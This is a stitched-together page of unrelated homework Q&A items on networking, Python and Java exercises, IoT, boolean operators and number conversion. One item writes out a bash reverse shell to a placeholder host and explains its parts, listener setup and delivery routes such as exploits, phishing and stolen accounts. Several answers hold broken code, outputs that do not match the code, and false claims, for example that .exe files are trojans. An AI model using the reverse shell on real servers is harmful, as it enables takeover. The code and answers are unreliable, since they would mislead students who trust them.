The characteristic of a SOHO network is option D: It is a small network that connects a few computers to each other and to the internet.
What does SOHO stand for?The SOHO network, also known as a single office, tiny office, or home office network, primarily refers to a business category with a few employees, typically between one and ten. It is a particular local area network connection, or LAN, designed for usage in small enterprises.
Therefore, based on the above, one can say that SOHO network enables PCs in a home office or remote office to access centralized, shared services or connect to a corporate network.
Learn more about SOHO network from
https://brainly.com/question/10674980
#SPJ1
See full question below
networking essentials (version 2) - modules 1 - 4: internet connection: getting online pre-test exam
What is a characteristic of a SOHO network?
It consists of multiple LANs with backbone infrastructure connections.
It is a large network, such as those used by corporations and schools, with hundreds or thousands of interconnected hosts.
It is a collection of interconnected private and public networks.
It is a small network that connects a few computers to each other and to the internet.
In a hash table both the keys and values are integers. We iterate over the key value pairs of a hash table and print each of the pairs of values in the format Key=a Value=b . Which of the following could be a valid out put?
Note that the valid output with regard to the hash table is: "Key=1, Value=10 Key=2, Value=10 Key=3, Value=100"
What is the explanation for the above response?The correct answer is "Key=1, Value=10 Key=2, Value=10 Key=3, Value=100", as it shows a valid output for iterating over key value pairs of a hash table.
The order of the keys and values may vary, but each key should be associated with its corresponding value. Option "Key=1, Value=11" is not a valid output because it implies that there are two values associated with the same key. The other options either have duplicate keys or values, or missing keys.
Learn more about hash table at:
https://brainly.com/question/29970427
#SPJ1
Write a program that takes as input a number of kilometers and prints the corresponding number of nautical miles.
Use the following approximations:
A kilometer represents 1/10,000 of the distance between the North Pole and the equator.
There are 90 degrees, containing 60 minutes of arc each, between the North Pole and the equator.
A nautical mile is 1 minute of an arc.
An example of the program input and output is shown below:
Enter the number of kilometers: 100
The number of nautical miles is 54
In python:
kilos = int(input("Enter the number of kilometers: "))
print(f"The number of nautical miles is {round(kilos/1.852,2)}")
I hope this helps!
For an input of 100 kilometers, the program displays "The number of nautical miles is 54.00."
To convert kilometers to nautical miles based on the given approximations.
Here are the simple steps to write the code:
1. Define a function called km_to_nautical_miles that takes the number of kilometers as input.
2. Multiply the number of kilometers by the conversion factor \((90 / (10000 \times 60))\) to get the equivalent number of nautical miles.
3. Return the calculated value of nautical miles from the function.
4. Prompt the user to enter the number of kilometers they want to convert.
5. Read the user's input and store it in a variable called kilometers.
6. Call the km_to_nautical_miles function, passing the kilometers variable as an argument, to perform the conversion.
7. Store the calculated value of nautical miles in a variable called nautical_miles.
8. Display the result to the user using the print function, formatting the output string as desired.
Now the codes are:
def km_to_nautical_miles(km):
nautical_miles = (km * 90) / (10000 * 60)
return nautical_miles
kilometers = float(input("Enter the number of kilometers: "))
nautical_miles = km_to_nautical_miles(kilometers)
print(f"The number of nautical miles is {nautical_miles:.2f}.")
The output of this program is:
The result is displayed to the user as "The number of nautical miles is 54.00."
To learn more about programming visit:
https://brainly.com/question/14368396
#SPJ4
You are doing a multimedia presentation on World War I, and you want to use a visual aid to show the battle areas. What visual aid is best suited for this purpose?
Answer:
Map
Explanation:
I put it in on Edg and got it correct, hope this helps :)
Answer:
The correct answer is map
Explanation:
I just did the assignment on edge 2020 and got it right
In this lab, you use what you have learned about parallel lists to complete a partially completed Python program. The program should either print the name and price for a coffee add-in from the Jumpin’ Jive Coffee Shop or it should print the message "Sorry, we do not carry that.".
The given python code is given below as it makes a parallel list and prints an output.
What is Python Programming?This refers to the high-level programming language that is used to build data structures and is object-oriented.
Hence, we can see that to use a parallel list to print a program in Python:
Python zip()
list_1 = [1, 2, 3, 4]
list_2 = ['a', 'b', 'c', 'd']
for i, j in zip (list_1, list_2):
print (j)
else
print (i) "Sorry, we do not carry that.";
Read more about python programs here:
https://brainly.com/question/26497128
#SPJ1
(problem is given by the image)
The program that prompts the user for three integers and displays their average as a floating point is given below:
The Code:import java.util.Scanner;
public class ArithmeticSmallestLargest {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
int num1;
int num2;
int num3;
int sum;
int average;
int product;
int largest;
int smallest;
System.out.print("Enter First Integer: ");
num1 = input.nextInt();
System.out.print("Enter Second Integer: ");
num2 = input.nextInt();
System.out.print("Enter Third Integer: ");
num3 = input.nextInt();
sum = num1 + num2 + num3;
average = sum / 3;
product = num1 * num2 * num3;
largest = num1;
smallest = num1;
if(num2 > largest)
largest = num2;
if(num3 > largest)
largest = num3;
if(num2 < smallest)
smallest = num2;
if (num3 < smallest)
smallest = num3;
System.out.println("The sum is " + sum);
System.out.println("The average is " + average);
System.out.println("The product is " + product);
System.out.println("Largest of three integers is " + largest + " and the smallest is "+ smallest + ".");
}
}
Read more about java programming here:
https://brainly.com/question/18554491
#SPJ1
exe files are types of trojan and malware virus and they send you blue screen of death.
Answer:
im not 100 percent surre but i think so
Explanation:
The main storage device inside a computer where programs and files are saved is called the
Answer:
ssd or hd (you can chose) ssd and hds are bigger file sizes saving for long term data while RAM gives applications a place to store and access data on a short-term basis. It stores the information your computer is actively using so that it can be accessed quickly.
So if you buy RAM you'll get 8-32 GB of ram and if you get ssd or hd you will get around 500 GB- 2 TB (with modern storage devices)
Answer: The answer should be the hard drive.
what are the main social and cultural impacts of lot?
Internet of Things refers to the connected devices and the technology that enables communication between the devices and between them and the cloud.
What are the main social and cultural impacts of IoT?Social impacts : Reduced waste, costs, and difficulties are promised benefits of the Internet of Things (IoT). As a result, it helps to increase productivity and enables us to live a more joyful, eco-friendly, and productive life.The Internet of Things (IoT) is also having a physical impact on society. Students will have access to the most recent materials and data thanks to IoT, which will free them from reliance on outmoded textbooks.Cultural impacts: IoT can build connection networks that change how people interact. The Internet of Things is working to keep us healthier and provide better healthcare.From wearable devices that incorporate medical equipment to smart sensors that provide real-time data on illnesses and remote monitoring of vital body processes ,the cultural role of IoT is tremendous.To learn more about Internet of Things , refer:
https://brainly.com/question/29240985
#SPJ1
I am having trouble figuring out how to write a code to complete this assignment in Python:
Implement the build_dictionary() function to build a word frequency dictionary from a list of words.
Ex: If the words list is:
["hey", "hi", "Mark", "hi", "mark"]
the dictionary returned from calling build_dictionary(words) is:
{'hey': 1, 'hi': 2, 'Mark': 1, 'mark': 1}
Ex: If the words list is:
["zyBooks", "now", "zyBooks", "later", "zyBooks", "forever"]
the dictionary returned from calling build_dictionary(words) is:
{'zyBooks': 3, 'now': 1, 'later': 1, 'forever': 1}
The main code builds the word list from an input string, calls build_dictionary() to build the dictionary, and displays the dictionary sorted by key value.
Ex: If the input is:
hey hi Mark hi mark
the output is:
Mark: 1
hey: 1
hi: 2
mark: 1
This is what I have been given:
# The words parameter is a list of strings.
def build_dictionary(words):
# The frequencies dictionary will be built with your code below.
# Each key is a word string and the corresponding value is an integer
# indicating that word's frequency.
'''your code goes here'''
# The following code asks for input, splits the input into a word list,
# calls build_dictionary(), and displays the contents sorted by key.
if __name__ == '__main__':
words = input().split()
your_dictionary = build_dictionary(words)
sorted_keys = sorted(your_dictionary.keys())
for key in sorted_keys:
print(key + ': ' + str(your_dictionary[key]))
Answer:
def build_dictionary(words):
dic = {}
for word in words:
dic [word] =words.count(word)
return(dic)
if __name__ == '__main__':
words = input().split()
your_dictionary = build_dictionary(words)
sorted_keys = sorted(your_dictionary.keys())
for key in sorted_keys:
print(key + ': ' + str(your_dictionary[key]))
Explanation:
use the count function cause the initial input is a list.
Following are the Python program code to count the list of word in the dictionary:
Python Program to count list of words:def build_dictionary(words):#defining the method build_dictionary that takes words as a parameter
f = {}#defining a variable dictionary as a f
for i in words:#defining a loop that checks dictionary value
if (i in f):#defining an if block that check dictionary value
f[i] += 1#addining 1 in the value of list
else:#defining else block
f[i] = 1#holding 1 in the list
return f#return list value
if __name__ == '__main__':
words = input().split()#defining a variable words that input value and splits its value
your_dictionary = build_dictionary(words)#defining a variable your_dictionary that adds value in build_dictionary
sorted_keys = sorted(your_dictionary.keys())#defining variable sorted_keys that sort value your_dictionary as key
for k in sorted_keys:#defining loop that counts number of value
print(k + ': ' + str(your_dictionary[k]))#defining print method that prints its value
Output:
Please find the attached file.
Program Explanation:
Defining the method "build_dictionary" that takes one parameter "words" in the method. Inside this method, a dictionary variable named "f" is declared in which a for loop is declared. Inside this, a conditional block is declared that counts words' value.In the next step, a constructor is declared, in which words variable is declared that input value and splits its value.In the next step, "your_dictionary" is declared that that adds value to build_dictionary, and use stored method is used that sort its value and store its value in "sorted_keys".After that, a for loop is declared that counts the "sorted_keys" dictionary value and prints its counted list value.
Find out more information about the dictionary here:
brainly.com/question/1199071
1. demonstrative
2. possessive
Question 2 Multiple Choice Worth 5 points)
(04.01 LC)
Computers take in and process certain kinds of information
O at the same rate as humans can
O in the same way humans can
much faster than humans can
O much more slowly than humans can
Answer:
Answer:much faster than Humans can
Answer:
c
Explanation:
Local Area Networks (LANs)
1)only cover a short block
2)increase networking speed
3)take too long
4)are not used anymore
Answer:
increase networking speed
Explanation:
2020 edge
Answer:
increasing network speed
Explanation:
took the assignment on edge 2020 mark me as brainiest
Write a Python class, Flower, that has three instance variables of type str, int, and float, that respectively represent the name of the flower, its number of petals, and its price. Your class must include a constructor method that initializes each variable to an appropriate value, and your class should include methods for setting the value of each type, and retrieving the value of each type.
Answer:
The python class is shown on the first uploaded image
Explanation:
With the help of the network, the attacker can obtain the shell or root shell of the remote server (Linux operating system-based) through the reverse shell attack, and then get full control of the server. The typical reverse shell instruction is as follows:
/bin/bash -c "/bin/bash -i > /dev/tcp/server_ip/9090 0<&1 2>&1"
1) Please explain the meaning of 0,1,2,>, <, & represented in the above statement;
2) What does the attacker need to do on his machine in order to successfully get the shell information output on the server side? And please explain the meaning represented by /dev/tcp/server_ip/9090;
3) Combined with the above statement, explain the implementation process of reverse shell attack;
4) Combined with the relevant knowledge learned in our class, what attacking methods can be used to successfully transmit and execute the above reverse shell instruction on the server side?
1. 0 represents standard input (stdin), 1 represents standard output (stdout), 2 represents standard error (stderr), > is output redirection, < is input redirection, and & is used for file descriptor redirection.
2. In this case, the attacker should listen on port 9090 using a tool such as netcat or a similar utility.
3.Identify vulnerable system, craft reverse shell payload, deliver payload to target, execute payload to establish connection with attacker are methods for implementation.
4. Exploiting vulnerabilities, social engineering, planting malware/backdoors, compromising trusted user accounts can be used to execute the reverse shell instruction.
1. In the reverse shell instruction provided ("/bin/bash -c "/bin/bash -i > /dev/tcp/server_ip/9090 0<&1 2>&1"), the symbols 0, 1, 2, >, <, and & represent the following:
0: It represents file descriptor 0, which is the standard input (stdin).
1: It represents file descriptor 1, which is the standard output (stdout).
2: It represents file descriptor 2, which is the standard error (stderr).
: It is the output redirection symbol and is used to redirect the output of a command to a file or device.
<: It is the input redirection symbol and is used to redirect input from a file or device to a command.
&: It is used for file descriptor redirection, specifically in this case, combining stdout and stderr into a single stream.
2. To successfully get the shell information output on the server side, the attacker needs to set up a listening service on their own machine. In this case, the attacker should listen on port 9090 using a tool such as netcat or a similar utility. The "/dev/tcp/server_ip/9090" in the reverse shell instruction represents the connection to the attacker's machine on IP address "server_ip" and port 9090. By specifying this address and port, the attacker creates a connection between their machine and the compromised server, allowing the output of the shell to be sent to their machine.
3. The reverse shell attack is typically performed in the following steps:
The attacker identifies a vulnerability in the target server and gains control over it.The attacker crafts a payload that includes the reverse shell instruction, which allows the attacker to establish a connection with their machine.The attacker injects or executes the payload on the compromised server, initiating the reverse shell connection.The reverse shell instruction creates a new shell on the compromised server and connects it to the attacker's machine, redirecting the shell's input and output streams to the network connection.Once the reverse shell connection is established, the attacker gains interactive access to the compromised server, obtaining a shell or root shell, and can execute commands as if they were directly working on the server itself.4. Successfully transmit and execute the reverse shell instruction on the server side, the attacker can use various attacking methods, including:
Exploiting a vulnerability: The attacker can search for known vulnerabilities in the target server's operating system or specific applications running on it. By exploiting these vulnerabilities, they can gain unauthorized access and inject the reverse shell payload.
Social engineering: The attacker may use social engineering techniques, such as phishing emails or deceptive messages, to trick a user with access to the server into executing the reverse shell payload unknowingly.
Malware or backdoor installation: If the attacker already has control over another system on the same network as the target server, they may attempt to install malware or a backdoor on that system. This malware or backdoor can then be used to launch the reverse shell attack on the target server.
Compromising a trusted user account: The attacker may target and compromise a user account with privileged access on the server. With the compromised account, they can execute the reverse shell instruction and gain control over the server.
It is important to note that carrying out such attacks is illegal and unethical unless done with proper authorization and for legitimate security testing purposes.
For more questions on Linux operating system-based
https://brainly.com/question/31763437
#SPJ11
Multiple Choice
The Boolean operators include which of the following?
A. and, or, not
B. to, for, from
C. a, an, the
D. is, are, not
Answer:
a
Explanation:
Boolean Operators are simple words (AND, OR, NOT or AND NOT) used as conjunctions to combine or exclude keywords in a search, resulting in more focused and productive results. ... Proximity Operators (with, near and others) can also help you in searching.
Suppose Charlie had installed key logger software on all company computer systems and had made a copy of Peter’s encryption key. Suppose that Charlie had this done without policy authority and without anyone’s knowledge, including Peter’s. Would the use of such a tool be an ethical violation on Charlie’s part? Is it illegal? Suppose that Charlie had implemented the key logger with the knowledge and approval of senior company executives, and that every employee had signed a release that acknowledged the company can record all information entered on company systems. Two days after Peter’s call, Charlie calls back to give Peter his key: "We got lucky and cracked it early." Charlie says this to preserve Peter’s illusion of privacy. Is such a "little white lie" an ethical action on Charlie’s part?
Answer: Provided in the explanation section
Explanation:
We will follow this question carefully with a well precise answer.
I hope at the end of the day, you find this useful.
Answer to First part:
-----------------------
Here as Charlie has not taken any one's permission even policy authority so using such keylogger tool is completely ethical violation on charlie's part. Because any decession that has taken by a company its not an issue until everyone agreed to it. Because without knowledge of such software the people will not be aware and they may get trap and also there is not any written document regarding the acknowledgement so its completely wrong or illegal to blame someone based on result of such softwares. And second illegal thing is to copy some else's encryption key because the policy should be equal to all the people and it should not be used for personal gain.
Answer to second part:
=================
No it is still not ethical action on Charle's part because the policy should be same for everyone and as Charlie is the one who installed this software so he should keep this secrate and not to misuse as its not a matter how Peter came to know his encryption key from Charlie but why should Charlie in first place copy the encryption key for peter and share the encryption code with Peter,its completely unethical.
cheers i hope this helped !!
1.Siguraduhing _______ang mga datos o impormasyong
2.Isaalang- alang ang partikular na _______ o lokasyon ng pinagmulan ng impormasyon
3.Upang matiyak na hindi ______ang mga impormasyon, maaaring magsaliksik at kilalaning mabuti ang awtor at ang kanyang mga artikulo
Answer:
1.maayos
2. Lugar
3. mali
Explanation:
im correct if I'm rwong :-)
Hi everyone,
for my undergraduate research project, I'm looking for an R code for agglomerative clustering. Basically, I need to know what happened inside hclust method in R. I have looked everywhere but don't find a proper way to combine 2 data points that have the smallest distance. I was stuck at developing a dissimilarity matrix after the first phase of dissimilarity matrix generation(literally I have generated the first dissimilarity matrix). I'm not specifying R, if anyone could give me a solution in any language I would gratefully accept that.
Answer:
Answer is being shown in the file to the link
A ______________ deals with the potential for weaknesses within the existing infrastructure to be exploited.
Answer:
Threat assessment
Explanation:
A threat assessment deals with the potential for weaknesses within the existing infrastructure to be exploited.
Threat Assessment is further explained as the practice of determining or ascertaining the credibility and seriousness of a potential threat, and also the probability or chases of the threat will becoming a reality.
Threat assessment is separate to the more established procedure of violence-risk assessment, which seek to forcast an individual's general capacity and tendency to respond to situations violently. Instead, threat assessment aims to interrupt people on a route to commit "predatory or instrumental violence, the type of behavior connected with targeted attacks".
Answer:
Threat assessment
Explanation:
In an IT system, threat assessment is the analysis, evaluation and prevention of actions, events and operations that can greatly affect the system. It explores the potential for weaknesses within existing infrastructure to be exploited.
The threat assessment is a very important assessment that needs to be taken in virtually all domains. Here are a few reasons why it is important in an IT system;
i. Prevention of data loss
ii. Prevention of system or network of systems downtime
In carrying out threat assessment, one might need to do the following;
i. identification and prioritization of infrastructure including the software and hardware applications in the system.
ii. identification of potential threats such as system failure, natural disaster, unwanted access.
iii. identification of vulnerabilities in the system.
iv. analysing controls by determining who has access and who doesn't.
v. analysing the impact of a threat occurrence.
vi. documentation of analysis and evaluation results.
A diagram of a ten-node network that uses ten routers
The diagram of the of a ten-node network that uses ten routers is given in the image attached.
What is a node in a network?A network node is known to be be seen as the kind of connection point that is seen amidst some network devices such as routers, printers, etc.
Note that they are known to often receive and send data from one network or endpoint to another.
Therefore, The diagram of the of a ten-node network that uses ten routers is given in the image attached.
Learn more about routers from
https://brainly.com/question/24812743
#SPJ1
Which describes a market research report? Select all that apply.
A record of customer names
A summary of consumer buying behaviors
A projection of future consumer buying behaviors
An analysis of consumer interests
Answer:
A projection of consumer buying behaviors prediction comes in various ways. It can be through collecting information through primary or secondary research such as analyzing online actions, feedback analysis, focus groups, conversational marketing, and more.
Please can someone help me with this AB + A+B
Answer:
Please specify the question, but I assume this is boolean algebra so the answer would be:
A + B
Explanation:
AB + A + B
Now we are solving the above expression using Boolean theorems:
Factoring
(1+B)A+(1+A)B
Identity Law A+1=1
1A+(1+A)B
Identity Law:A.1=1
A+(1+A)B
Identity Law A+1=1
A+1B
Identity Law:A.1=1
A+B
Explain why the scenario below fails to meet the definition of showrooming.
Situation: Maricella, a manager for an online store, wants customers to see the power of certain software packages. In order to accomplish this goal, Maricella agrees to refund 90% of the purchase price of software within seventy-two hours of purchase.
I believe it fails to meet the explanation of showrooming because rather than trying to show off the merchandise, Maricella attempts to indirectly bribe with the customers by offering a guaranteed refund. It also is not before purchase or being payed for online.
What is a customer?A customer is a person or business that buys products or services from another business. Customers are essential to businesses because they bring in money; without them, they would be out of business. All businesses compete with one another to attract customers, whether through aggressive product promotion, price cuts to attract more customers, or the development of unique goods and experiences that customers adore. Consider businesses like Apple, Tesla, and Gοοgle.
The adage "the customer is always right" is frequently upheld by businesses because happy customers are more likely to endorse companies that meet or exceed their needs. As a result, many companies closely monitor their customer interactions to gather feedback on how to improve their product offerings. There are numerous ways to categorise customers. Customers are most frequently divided into internal and external categories.
Learn more about customers
https://brainly.com/question/4110146
#SPJ1
How do a write 19/19 as a whole number
Answer:
1.0
Explanation:
You divide 19 by 19 and get 1
Daily requirements of 70 g of protein, 1 g calcium, 12 mg iron, and 3000 calories are needed for a balanced diet. The following foods are available for consumption with the cost and nutrients per 100 g as shown.
Protein
(g)
Calories
Calcium
(g)
Iron
Cost
GH¢
Brown Bread
12
246
0.1
3.2
0.5
Cheese
24.9
423
0.2
0.3
2
Butter
0.1
793
0.03
0
1
Baked Beans
6
93
0.05
2.3
0.25
Spinach
3
26
0.1
2
0.25
The objective is to find a balanced diet with minimum cost.
(a) Formulate a linear programming model for this problem.
(b) Use solver to find optimal solution and sensitivity report.
Answer:
i think i know
Explanation:
Please send code for both index and style.
please be more specific about what index and style. sorry i wasn't much help.
Select all the correct answers. Which TWO of the following are key components of a computer's central processing unit? input device output device data bus arithmetic logic unit control unit
Explanation:
Arithmetic logic unit and control unit
Hiya people. I am a game developer and I need an idea for a new game. If you have any ideas, pls feel free to tell me. Best idea gets brainliest.
Answer:
A better RPG game all the one that are existing are the same dull thing
Explanation:
Answer:
There are many ideas you can get for games but now-a-days action games are getting more fame than others such as fortnite, freefire, pubg etc. I prefer you to make a game that is relatated to action or adventure. You can make it related to zombie hunting, or online fighting games, or some adventurous games like tomb raider.
true or false. Two of the main differences between storage and memory is that storage is usually very expensive, but very fast to access.
Answer:
False. in fact, the two main differences would have to be that memory is violate, meaning that data is lost when the power is turned off and also memory is faster to access than storage.
Type the correct answer in each box. Spell all words correctly, and use numerals instead of words for numbers. If necessary, use / for the fraction bar(s). What is the hexadecimal equivalent of the decimal number 125.28? The hexadecimal equivalent of the decimal number 125.28 is
Answer:
125.28₁₀ in hexadecimal = 7D.47AE147AE1₁₆
Step-by-Step Explanation:
To convert decimal number 125.28, we convert its integer and fraction part individually and then add them to get the equivalent hexadecimal number, as below:
To convert integer 125 to hexadecimal, follow these steps:
Divide 125 by 16 keeping notice of the quotient and the remainder. Continue dividing the quotient by 2 until you get a quotient of zero.
Then just write out the remainders in the reverse order to get the equivalent hexadecimal number.
125 / 16 = 7 with remainder 13 (D)
7 / 16 = 0 with remainder 7
Here is the answer to 125 decimal to hexadecimal number:
7D
For converting decimal fraction 0.28 to hexadecimal number, follow these steps:
Multiply 0.28 by 16 keeping notice of the resulting integer and fractional part. Continue multiplying by 16 until you get a resulting fractional part equal to zero (we calcuclate upto ten digits).
Then just write out the integer parts from the results of each multiplication to get equivalent hexadecimal number.
0.28 × 16 = 4 + 0.48
0.48 × 16 = 7 + 0.68000000000001
0.68000000000001 × 16 = 10 (A) + 0.88000000000011
0.88000000000011 × 16 = 14 (E) + 0.080000000001746
0.080000000001746 × 16 = 1 + 0.28000000002794
0.28000000002794 × 16 = 4 + 0.48000000044703
0.48000000044703 × 16 = 7 + 0.68000000715256
0.68000000715256 × 16 = 10 (A) + 0.88000011444092
0.88000011444092 × 16 = 14 (E) + 0.080001831054688
0.080001831054688 × 16 = 1 + 0.280029296875
Here is the answer to 0.28 decimal to hexadecimal number:
0.47AE147AE1
Therefore, decimal number 125.28 converted to hexadecimal is equal:
7D.47AE147AE1